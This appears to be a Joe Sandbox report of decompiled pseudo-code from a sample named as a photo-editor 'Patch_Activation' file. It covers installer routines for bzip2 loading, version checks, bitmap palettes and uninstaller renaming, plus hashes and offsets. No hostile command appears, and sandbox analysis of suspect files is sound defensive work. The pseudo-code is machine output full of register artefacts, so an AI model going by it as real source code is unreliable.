Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 190572456-508647305
Opcode ID: dde6d51f60abe5d0672bfaed80a86c2dd87a06dd1ae076193d4a680638cd494a
Instruction ID: 1edccc56acb66b4562ddfa4c7a90d58ee85ee4b976394e257a4a6a33c45d2cf5
Opcode Fuzzy Hash: dde6d51f60abe5d0672bfaed80a86c2dd87a06dd1ae076193d4a680638cd494a
Instruction Fuzzy Hash: 52F01DB09056008BD314DF36AC45727379DEB98306F58803BA845D11A3E77A089CEA0C

Uniqueness

Uniqueness Score: -1.00%

Function 0045DF18 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045DF18(struct HINSTANCE__* __eax) {
				intOrPtr _t5;
				struct HINSTANCE__* _t6;

				_t6 = __eax;
				 *0x49f09c = GetProcAddress(__eax, "BZ2_bzDecompressInit");
				 *0x49f0a0 = GetProcAddress(_t6, "BZ2_bzDecompress");
				 *0x49f0a4 = GetProcAddress(_t6, "BZ2_bzDecompressEnd");
				if( *0x49f09c == 0 ||  *0x49f0a0 == 0 ||  *0x49f0a4 == 0) {
					_t5 = 0;
				} else {
					_t5 = 1;
				}
				if(_t5 == 0) {
					 *0x49f09c = 0;
					 *0x49f0a0 = 0;
					 *0x49f0a4 = 0;
					return _t5;
				}
				return _t5;
			}

0x0045df19
0x0045df26
0x0045df36
0x0045df46
0x0045df52
0x0045df66
0x0045df6a
0x0045df6a
0x0045df6a
0x0045df6e
0x0045df72
0x0045df7a
0x0045df82
0x00000000
0x0045df82
0x0045df89

APIs

GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045DF21
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DF31
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DF41

Strings

BZ2_bzDecompress, xrefs: 0045DF2B
BZ2_bzDecompressEnd, xrefs: 0045DF3B
BZ2_bzDecompressInit, xrefs: 0045DF1B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 1ba7f0a7f932c0f12d1df9f0648249643268a813f4c94efa46eb8b1189ec4832
Instruction ID: c781611ed6df2ffd52f678218cea13a9d8474895aea0bca464552a1c0941260e
Opcode Fuzzy Hash: 1ba7f0a7f932c0f12d1df9f0648249643268a813f4c94efa46eb8b1189ec4832
Instruction Fuzzy Hash: 97F030B5E00300DEE724DF32AC0972336D9AFA4716F14803BA946D66A3D378444DCE2D

Uniqueness

Uniqueness Score: -1.00%

Function 0042EEAC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042EEAC(void* __eax, void* __edx) {
				void* _t8;
				void* _t10;

				_t8 = __edx;
				_t10 = __eax;
				if( *0x49e66c == 0) {
					 *0x49e670 = GetProcAddress(GetModuleHandleA("user32.dll"), "ChangeWindowMessageFilterEx");
					InterlockedExchange(0x49e66c, 1);
				}
				if( *0x49e670 == 0) {
					return E0042EE3C(_t8);
				} else {
					return  *0x49e670(_t10, _t8, 1, 0);
				}
			}

0x0042eeae
0x0042eeb0
0x0042eeb9
0x0042eed0
0x0042eedc
0x0042eedc
0x0042eee8
0x0042ef02
0x0042eeea
0x0042eef8
0x0042eef8

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,0049C938,00457A81,00457E24,004579D8,00000000,00000B06,00000000,00000000,00000002,00000000,0048361D), ref: 0042EEC5
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EECB
InterlockedExchange.KERNEL32(0049E66C,00000001), ref: 0042EEDC

Part of subcall function 0042EE3C: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EF00,00000004,0049C938,00457A81,00457E24,004579D8,00000000,00000B06,00000000,00000000,00000002,00000000,0048361D), ref: 0042EE52
Part of subcall function 0042EE3C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EE58
Part of subcall function 0042EE3C: InterlockedExchange.KERNEL32(0049E664,00000001), ref: 0042EE69

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,0049C938,00457A81,00457E24,004579D8,00000000,00000B06,00000000,00000000,00000002,00000000,0048361D), ref: 0042EEF0

Strings

ChangeWindowMessageFilterEx, xrefs: 0042EEBB
user32.dll, xrefs: 0042EEC0

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 142928637-2676053874
Opcode ID: 927f38515658db31c7fed5d91d2e5f67c49424a855da097203f7ba78f6ca986b
Instruction ID: d73472cc1cf9ee785b15135c95e247d87a8e276cbab312dacd1aac06db931f35
Opcode Fuzzy Hash: 927f38515658db31c7fed5d91d2e5f67c49424a855da097203f7ba78f6ca986b
Instruction Fuzzy Hash: 6BE01BB1750720E6EE10B7777C46FA72654DB64769F950437F100A51D1C7FE0C848A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047AD94 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047AD94() {
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t4;

				_t4 = GetModuleHandleA("kernel32.dll");
				 *0x49f0ec = GetProcAddress(_t4, "VerSetConditionMask");
				_t3 = GetProcAddress(_t4, "VerifyVersionInfoW");
				 *0x49f0f0 = _t3;
				return _t3;
			}

0x0047ad9f
0x0047adac
0x0047adb7
0x0047adbc
0x0047adc2

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0049BAA8), ref: 0047AD9A
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047ADA7
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047ADB7

Strings

VerSetConditionMask, xrefs: 0047ADA1
kernel32.dll, xrefs: 0047AD95
VerifyVersionInfoW, xrefs: 0047ADB1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: b45619e19b7df4f31f5a5e1e7913cc9e2f5992c7008335275ff0f295cd2b689d
Instruction ID: e761ed85866ee686b9535240fc539701727dd680da56f3fb001ecc562e4fb54d
Opcode Fuzzy Hash: b45619e19b7df4f31f5a5e1e7913cc9e2f5992c7008335275ff0f295cd2b689d
Instruction Fuzzy Hash: 07C012E0680701AED610B7715C86D7E254DD550B1A320C03B7089B55C3D67C0C284F2D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAFC Relevance: 9.1, APIs: 6, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041BAFC(intOrPtr* __eax, void* __ebx, struct HPALETTE__** __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				struct HPALETTE__** _v12;
				signed int _v14;
				struct HWND__* _v20;
				struct HDC__* _v24;
				void* _v28;
				BITMAPINFOHEADER* _v32;
				struct HPALETTE__* _v36;
				signed int _v44;
				intOrPtr _v62;
				short _v64;
				void _v76;
				void* _t100;
				void* _t113;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr* _t128;
				intOrPtr* _t130;
				void* _t132;
				void* _t133;
				intOrPtr _t134;
				intOrPtr _t135;

				_t122 = __edi;
				_t132 = _t133;
				_t134 = _t133 + 0xffffffb8;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t128 = __eax;
				_t113 =  &_v76 + 4;
				 *((intOrPtr*)( *__eax))();
				_v76 = _a8;
				if(_v64 != 1) {
					E0041B80C();
				}
				_t137 = _v44;
				if(_v44 == 0) {
					_v44 = E0041B978(_v62);
				}
				_v14 = _v44 << 2;
				_v32 = E00406E6C((_v14 & 0x0000ffff) + 0x28, _t113, _t122, _t137);
				 *[fs:ecx] = _t134;
				_t100 = _v32;
				memcpy(_t100,  &_v76, 0xa << 2);
				_t135 = _t134 + 0xc;
				_t130 = _t128;
				_t126 =  *_t130;
				 *((intOrPtr*)( *_t130))( *[fs:ecx], 0x41bcf0, _t132);
				 *_v12 = E0041B998(_v32);
				_a4 = _a4 - (_v14 & 0x0000ffff) + 0x28;
				_t118 =  *((intOrPtr*)(_t100 + 0x14));
				if(_t118 != 0) {
					_t139 = _t118 - _a4;
					if(_t118 < _a4) {
						_a4 = _t118;
					}
				}
				_v28 = E00406E6C(_a4, _t118, _t126, _t139);
				 *[fs:eax] = _t135;
				 *((intOrPtr*)( *_t130))( *[fs:eax], 0x41bccc, _t132);
				_v20 = GetFocus();
				_v24 = GetDC(_v20);
				if(_v24 == 0) {
					E0041B824();
				}
				_push(_t132);
				_push(0x41bcac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				if( *_v12 == 0) {
					__eflags = 0;
					_v36 = 0;
				} else {
					_v36 = SelectPalette(_v24,  *_v12, 0);
					RealizePalette(_v24);
				}
				_push(_t132);
				_push(0x41bc8a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				 *_v8 = CreateDIBitmap(_v24, _v32, 4, _v28, _v32, 0);
				if( *_v8 == 0) {
					E0041B824();
				}
				_pop(_t121);
				 *[fs:eax] = _t121;
				_push(E0041BC91);
				if(_v36 == 0) {
					return 0;
				} else {
					return SelectPalette(_v24, _v36, 0);
				}
			}

0x0041bafc
0x0041bafd
0x0041baff
0x0041bb04
0x0041bb05
0x0041bb08
0x0041bb0b
0x0041bb10
0x0041bb1c
0x0041bb21
0x0041bb29
0x0041bb2b
0x0041bb2b
0x0041bb30
0x0041bb34
0x0041bb3f
0x0041bb3f
0x0041bb49
0x0041bb59
0x0041bb67
0x0041bb6a
0x0041bb78
0x0041bb78
0x0041bb7a
0x0041bb84
0x0041bb86
0x0041bb93
0x0041bb9e
0x0041bba1
0x0041bba6
0x0041bba8
0x0041bbab
0x0041bbad
0x0041bbad
0x0041bbab
0x0041bbb8
0x0041bbc6
0x0041bbd3
0x0041bbda
0x0041bbe6
0x0041bbed
0x0041bbef
0x0041bbef
0x0041bbf6
0x0041bbf7
0x0041bbfc
0x0041bbff
0x0041bc08
0x0041bc29
0x0041bc2b
0x0041bc0a
0x0041bc1b
0x0041bc22
0x0041bc22
0x0041bc30
0x0041bc31
0x0041bc36
0x0041bc39
0x0041bc58
0x0041bc60
0x0041bc62
0x0041bc62
0x0041bc69
0x0041bc6c
0x0041bc6f
0x0041bc78
0x0041bc89
0x0041bc7a
0x00000000
0x0041bc84

APIs

GetFocus.USER32 ref: 0041BBD5
GetDC.USER32(?), ref: 0041BBE1
SelectPalette.GDI32(00000000,?,00000000), ref: 0041BC16
RealizePalette.GDI32(00000000), ref: 0041BC22
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC50
SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BC84

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Palette$Select$BitmapCreateFocusRealize
String ID:
API String ID: 3275473261-0
Opcode ID: c95e916aea5b0b320e39deb2acbd71507781b42672567b85ab8b3b895a144eff
Instruction ID: 6f3d196da8cc9963e266c073c65a40cf0d83fd4bf7ad6034c31d612a174a896e
Opcode Fuzzy Hash: c95e916aea5b0b320e39deb2acbd71507781b42672567b85ab8b3b895a144eff
Instruction Fuzzy Hash: 23511D70A00209AFDB11DFA9C895AEEBBF8FF49704F10446AF500A7750D7799D81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDCC Relevance: 9.1, APIs: 6, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041BDCC(intOrPtr* __eax, void* __ebx, struct HPALETTE__** __ecx, intOrPtr* __edx, void* __edi, void* __esi, long _a8) {
				void* _v8;
				struct HPALETTE__** _v12;
				signed int _v14;
				struct HWND__* _v20;
				struct HDC__* _v24;
				void* _v28;
				BITMAPINFO* _v32;
				struct HPALETTE__* _v36;
				signed int _v40;
				intOrPtr _v42;
				short _v44;
				short _v48;
				long _v52;
				BITMAPINFOHEADER* _t65;
				BITMAPINFOHEADER* _t99;
				long* _t109;
				signed int _t115;
				intOrPtr _t121;
				intOrPtr* _t126;
				void* _t129;
				void* _t130;
				intOrPtr _t131;
				signed int _t134;

				_t129 = _t130;
				_t131 = _t130 + 0xffffffd0;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t126 = __eax;
				_t109 =  &(( &_v52)[1]);
				 *((intOrPtr*)( *__eax))();
				_v52 = _a8;
				_t132 = _v44 - 1;
				if(_v44 != 1) {
					E0041B80C();
				}
				_v14 = E0041B978(_v42) + _t53 * 2;
				_v32 = E00406E6C((_v14 & 0x0000ffff) + 0xf, _t109, _v14 & 0x0000ffff, _t132);
				 *[fs:edx] = _t131;
				_t99 = _v32;
				_t99->biSize = _v52;
				_t99->biWidth = _v48;
				_t99->biHeight = _v44;
				_t124 =  *_t126;
				 *((intOrPtr*)( *_t126))( *[fs:edx], 0x41bfbd, _t129);
				 *_v12 = E0041BD00(_v32,  &(_t99->biPlanes), _t132);
				_t65 = _t99;
				_t115 = (_t65->biWidth & 0x0000ffff) * (_t65->biHeight & 0x0000ffff) + 0x1f;
				if(_t115 < 0) {
					_t115 = _t115 + 0x1f;
					_t134 = _t115;
				}
				_v40 = (_t115 >> 5 << 2) * (_t65->biWidth & 0x0000ffff);
				_v28 = E00406E6C(_v40, (_t115 >> 5 << 2) * (_t65->biWidth & 0x0000ffff), _t124, _t134);
				 *[fs:eax] = _t131;
				 *((intOrPtr*)( *_t126))( *[fs:eax], 0x41bf99, _t129);
				_v20 = GetFocus();
				_v24 = GetDC(_v20);
				if(_v24 == 0) {
					E0041B824();
				}
				_push(_t129);
				_push(0x41bf79);
				_push( *[fs:eax]);
				 *[fs:eax] = _t131;
				_v36 = 0;
				if( *_v12 != 0) {
					_v36 = SelectPalette(_v24,  *_v12, 0);
					RealizePalette(_v24);
				}
				_push(_t129);
				_push(0x41bf57);
				_push( *[fs:eax]);
				 *[fs:eax] = _t131;
				 *_v8 = CreateDIBitmap(_v24, _t99, 4, _v28, _v32, 0);
				if( *_v8 == 0) {
					E0041B824();
				}
				_pop(_t121);
				 *[fs:eax] = _t121;
				_push(E0041BF5E);
				if(_v36 != 0) {
					return SelectPalette(_v24, _v36, 0);
				}
				return 0;
			}

0x0041bdcd
0x0041bdcf
0x0041bdd4
0x0041bdd5
0x0041bdd8
0x0041bddb
0x0041bde0
0x0041bdec
0x0041bdf1
0x0041bdf4
0x0041bdf9
0x0041bdfb
0x0041bdfb
0x0041be0c
0x0041be1e
0x0041be2c
0x0041be2f
0x0041be35
0x0041be3a
0x0041be40
0x0041be4a
0x0041be4c
0x0041be59
0x0041be5b
0x0041be68
0x0041be6d
0x0041be6f
0x0041be6f
0x0041be6f
0x0041be7f
0x0041be8a
0x0041be98
0x0041bea5
0x0041beac
0x0041beb8
0x0041bebf
0x0041bec1
0x0041bec1
0x0041bec8
0x0041bec9
0x0041bece
0x0041bed1
0x0041bed6
0x0041bedf
0x0041bef2
0x0041bef9
0x0041bef9
0x0041bf00
0x0041bf01
0x0041bf06
0x0041bf09
0x0041bf25
0x0041bf2d
0x0041bf2f
0x0041bf2f
0x0041bf36
0x0041bf39
0x0041bf3c
0x0041bf45
0x00000000
0x0041bf51
0x0041bf56

APIs

GetFocus.USER32 ref: 0041BEA7
GetDC.USER32(?), ref: 0041BEB3
SelectPalette.GDI32(00000000,?,00000000), ref: 0041BEED
RealizePalette.GDI32(00000000), ref: 0041BEF9
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BF1D
SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BF51

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Palette$Select$BitmapCreateFocusRealize
String ID:
API String ID: 3275473261-0
Opcode ID: 9472f51cddc4c318b63d6c649322b096de862bc5fca767e6fe291a367ca23efe
Instruction ID: d1d8e12ac76011fa0e11fd225ecf21e9d1788b3d06fe05564f2eab64f20773a9
Opcode Fuzzy Hash: 9472f51cddc4c318b63d6c649322b096de862bc5fca767e6fe291a367ca23efe
Instruction Fuzzy Hash: 28510875A00618AFCB11DFA9C891AEEBBF9EF49700F158066F504EB750D7389D40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00477568 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00477568(long __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char* _v48;
				char _v52;
				void* _t75;
				void* _t79;
				intOrPtr _t95;
				intOrPtr _t101;
				void* _t113;
				void* _t116;

				_t88 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v52 = 0;
				_push(_t116);
				_push(0x4776fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xffffffd0;
				if( *((intOrPtr*)(_a4 - 0x10)) == 0) {
					L13:
					__eflags = 0;
					_pop(_t95);
					 *[fs:eax] = _t95;
					_push(0x477704);
					E00403400( &_v52);
					return E00403420( &_v36, 3);
				} else {
					E004585A0("Renaming uninstaller.", __ebx, __ecx, 0x49f1c8, __esi);
					_t113 = 4;
					while(1) {
						E0042F2FC( &_v16, 0x3e8);
						if(E0042F118( *((intOrPtr*)(_a4 - 0x10)), _t88,  *0x49f1c8, 0x49f1c8, _t113) != 0) {
							break;
						}
						_t88 = GetLastError();
						if(_t88 == 5 || _t88 == 0x20) {
							_t122 = _t113;
							if(_t113 <= 0) {
								goto L7;
							}
							_v24 = _t88;
							_v20 = 0;
							E004587AC("The existing file appears to be in use (%d). Retrying.", _t88, 0,  &_v24, 0x49f1c8, _t113);
							_t113 = _t113 - 1;
							E0042F2E4( &_v16, _t122);
							E0046FC2C();
						} else {
							L7:
							_push(5);
							_push(1);
							_push(2);
							E00403494( &_v28,  *0x49f1c8);
							E0040357C( &_v28, 0x477774);
							_t101 =  *0x49ed74; // 0x230c2c8
							E0040357C( &_v28, _t101);
							E0040357C( &_v28, 0x477774);
							_push( &_v28);
							_v48 = "MoveFileEx";
							E004071F8(_t88,  &_v32);
							_v44 = _v32;
							E0042ED58(_t88,  &_v52);
							_v40 = _v52;
							E00451C00(0x3b, 2,  &_v48,  &_v36);
							E0042EB3C(_v36, 2,  &_v32);
							_pop(_t75);
							E0040357C(_t75, _v32);
							_t79 = E00481214(_v28, _t88, 2, 0, 0x49f1c8, _t113) - 2;
							__eflags = _t79;
							if(_t79 == 0) {
								E00409070();
							} else {
								__eflags = _t79 != 2;
								if(_t79 != 2) {
									E004585A0("LoggedMsgBox returned an unexpected value. Assuming Cancel.", _t88, 2, 0x49f1c8, _t113);
									E00409070();
								}
							}
						}
					}
					__eflags = _a4 + 0xfffffff0;
					E00403400(_a4 + 0xfffffff0);
					goto L13;
				}
			}

0x00477568
0x0047756e
0x0047756f
0x00477570
0x00477573
0x00477576
0x00477579
0x0047757c
0x00477586
0x00477587
0x0047758c
0x0047758f
0x00477599
0x004776da
0x004776da
0x004776dc
0x004776df
0x004776e2
0x004776ea
0x004776fc
0x0047759f
0x004775a4
0x004775a9
0x004775ae
0x004775b6
0x004775ca
0x00000000
0x00000000
0x004775d5
0x004775da
0x004775e1
0x004775e3
0x00000000
0x00000000
0x004775e5
0x004775e8
0x004775f6
0x004775fb
0x004775ff
0x00477604
0x0047760b
0x0047760b
0x0047760b
0x0047760d
0x0047760f
0x00477616
0x00477623
0x0047762b
0x00477631
0x0047763e
0x00477646
0x00477650
0x00477658
0x00477660
0x00477668
0x00477670
0x0047767d
0x00477688
0x00477690
0x00477691
0x004776a2
0x004776a2
0x004776a5
0x004776b1
0x004776a7
0x004776a7
0x004776aa
0x004776c0
0x004776c5
0x004776c5
0x004776aa
0x004776a5
0x004775da
0x004776d2
0x004776d5
0x00000000
0x004776d5

APIs

Part of subcall function 0042F2FC: GetTickCount.KERNEL32 ref: 0042F302

Part of subcall function 0042F118: MoveFileExA.KERNEL32 ref: 0042F14D

GetLastError.KERNEL32(00000000,004776FD,?,?,0049F1E4,00000000), ref: 004775D0

Strings

MoveFileEx, xrefs: 0047764B
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 004776BB
Renaming uninstaller., xrefs: 0047759F
The existing file appears to be in use (%d). Retrying., xrefs: 004775F1
, xrefs: 0047761E, 00477639

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx$Renaming uninstaller.$The existing file appears to be in use (%d). Retrying.
API String ID: 2406187244-79500563
Opcode ID: d597868801e4d0ea2fd5800a3e69bd95f30f368d2522e7376fb4945bdb66630f
Instruction ID: 6023fe8b67aa7ba447fd38945f059c1701a0e9a08149722a7a21e5b3243787af
Opcode Fuzzy Hash: d597868801e4d0ea2fd5800a3e69bd95f30f368d2522e7376fb4945bdb66630f
Instruction Fuzzy Hash: 2B4145749041099FCB11EFA9D882ADEB7B4EF48314FA0853BE404A7355D77CA905CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041B998 Relevance: 9.1, APIs: 6, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041B998(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				short* _v16;
				intOrPtr _v20;
				struct HDC__* _v24;
				struct HWND__* _v28;
				void* __edi;
				short _t45;
				intOrPtr* _t67;
				short* _t76;
				intOrPtr _t83;
				signed int _t85;
				void* _t87;
				int _t89;
				short _t92;
				intOrPtr* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;
				intOrPtr _t100;

				_t97 = _t99;
				_t100 = _t99 + 0xffffffe8;
				_push(_t87);
				_v8 = __eax;
				_v12 = 0;
				_t45 =  *((intOrPtr*)(_v8 + 0x20));
				if(_t45 == 0) {
					_t92 = E0041B978( *((intOrPtr*)(_v8 + 0xe)));
				} else {
					_t83 = _v8;
					_t92 = _t45;
				}
				_t104 = _t92 - 2;
				if(_t92 <= 2) {
					return _v12;
				} else {
					_v20 = (_t92 - 1 << 2) + 8;
					_v16 = E00406E6C(_v20, _t83, _t87, _t104);
					_push(_t97);
					_push(0x41bae8);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t100;
					_t76 = _v16;
					E00402934(_t76, _v20);
					 *((short*)(_t76 + 2)) = _t92;
					 *_t76 = 0x300;
					_v28 = GetFocus();
					_v24 = GetDC(_v28);
					_push(_t97);
					_push(0x41babc);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t100;
					_t89 = GetDeviceCaps(_v24, 0x68);
					if(_t92 != 0x10 || _t89 < 0x10) {
						_t94 = _t92 - 1;
						__eflags = _t94;
						if(_t94 >= 0) {
							_t95 = _t94 + 1;
							_t85 = 0;
							_t67 = _v8 + 0x2a;
							__eflags = _t67;
							do {
								 *((char*)(_t76 + 4 + _t85 * 4)) =  *_t67;
								 *((char*)(_t76 + 5 + _t85 * 4)) =  *((intOrPtr*)(_t67 - 1));
								 *((char*)(_t76 + 6 + _t85 * 4)) =  *((intOrPtr*)(_t67 - 2));
								 *((char*)(_t76 + 7 + _t85 * 4)) = 0;
								_t85 = _t85 + 1;
								_t67 = _t67 + 4;
								_t95 = _t95 - 1;
								__eflags = _t95;
							} while (_t95 != 0);
						}
					} else {
						GetSystemPaletteEntries(_v24, 0, 8, _t76 + 4);
						GetSystemPaletteEntries(_v24, _t89 - 8, 8, _t76 + 0x24);
					}
					_pop( *[fs:0x0]);
					_push(E0041BAC3);
					return ReleaseDC(_v28, _v24);
				}
			}

0x0041b999
0x0041b99b
0x0041b9a0
0x0041b9a1
0x0041b9a6
0x0041b9ac
0x0041b9b1
0x0041b9c6
0x0041b9b3
0x0041b9b3
0x0041b9b6
0x0041b9b6
0x0041b9c8
0x0041b9cb
0x0041baf8
0x0041b9d1
0x0041b9da
0x0041b9e5
0x0041b9ea
0x0041b9eb
0x0041b9f0
0x0041b9f3
0x0041b9f6
0x0041ba00
0x0041ba05
0x0041ba09
0x0041ba13
0x0041ba1f
0x0041ba24
0x0041ba25
0x0041ba2a
0x0041ba2d
0x0041ba3b
